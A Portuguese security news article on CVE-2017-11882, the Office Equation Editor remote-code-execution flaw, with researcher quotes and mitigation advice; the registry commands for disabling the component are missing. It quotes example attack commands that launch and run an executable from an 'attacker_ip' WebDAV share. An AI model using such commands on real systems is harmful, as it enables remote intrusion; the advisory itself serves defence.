e-forense - Análise Forense Computacional, Hacking, Segurança & Código

Quando o mundo ainda está a recuperar da ameaça do recurso não corrigido DDE no pacote Microsoft Office, os investigadores descobriram mais um problema sério com outro componente do Office, este permite alguém malicioso instalar remotamente malware.

A vulnerabilidade é um problema de corrupção de memória que reside em todas as versões do Microsoft Office lançados nos últimos 17 anos, incluindo o Microsoft Office 365, e funciona contra todas as versões do sistema operacional Windows, incluindo a atualização mais recente Microsoft Windows 10 Creators.

Descoberto por investigadores de segurança da empresa Embedi, a vulnerabilidade leva à execução de código remoto, permitindo que um hacker remoto não autenticado execute código malicioso num sistema específico sem exigir a interação do utilizador depois deste abrir um documento mal-intencionado.

A vulnerabilidade, foi identificada como CVE-2017-11882, e reside no ficheiro executável EQNEDT32.EXE, um componente do MS Office responsável pela inserção e edição de equações (objetos OLE) nos documentos.



No entanto, devido a operações inadequadas de memória, o componente não processa adequadamente objetos na memória, corrompendo-o de tal forma que o hacker consegue executar código malicioso como o utilizador.

À dezassete anos atrás, o EQNEDT32.EXE foi introduzido no Microsoft Office 2000 e foi mantido em todas as versões lançadas após o Microsoft Office 2007, para garantir a retrocompatibilidade entre documentos de versões mais antigas.

DEMONSTRAÇÃO: Vulnerabilidade permite controlo total de um sistema

Esta vulnerabilidade exige a abertura de um arquivo malicioso especialmente criado com uma versão afetada do software Microsoft Office ou Microsoft WordPad.

Pode assumir o controlo total de um sistema quando combinado com as vulnerabilidades de elevação de privilégios do kernel do Windows (como o CVE-2017-11847).

Um cenário possível:

Ao explicar o alcance da vulnerabilidade, os investigadores da Embedi sugeriram vários cenários possíveis:

"Ao inserir vários objetos OLE que exploraram a vulnerabilidade descrita, foi possível executar uma sequência arbitrária de comandos (por exemplo, fazer download de um arquivo da Internet e executá-lo)".

"Uma das maneiras mais fáceis de executar código arbitrário é usar um arquivo executável de um servidor WebDAV comprometido ".

"No entanto, um hacker também pode usar a vulnerabilidade para executar os comandos shell como cmd.exe / c start \\ attacker_ip \ ff. Este comando pode ser utilizado para iniciar um WebClient".

"Depois disso, o hacker pode correr um executável do servidor WebDAV usando o comando \\ attacker_ip \ ff \ 1.exe.".

Como proteger contra esta vulnerabilidade:

Com o lançamento do Patch deste mês, a Microsoft abordou esta vulnerabilidade ao alterar a forma como o software afetado lida com os objetos na memória.

Portanto, os utilizadores são fortemente recomendados para aplicar os patches de segurança de novembro o mais rápido possível para evitar que hackers e ciber criminosos tomem controlo dos seus computadores.

Uma vez que este componente tem uma série de problemas de segurança que podem ser facilmente explorados, desativá-lo pode ser a melhor maneira de garantir a segurança dos seus sistemas.

Os utilizadores podem executar o seguinte comando shell para desabilitar o registo do componente no Windows Registry:

Para 32-Bits:



Para 64-Bits:



Além disso, os utilizadores também devem ativar Protected View (Microsoft Office sandbox) para evitar a execução de conteúdo ativo (OLE / ActiveX / Macro).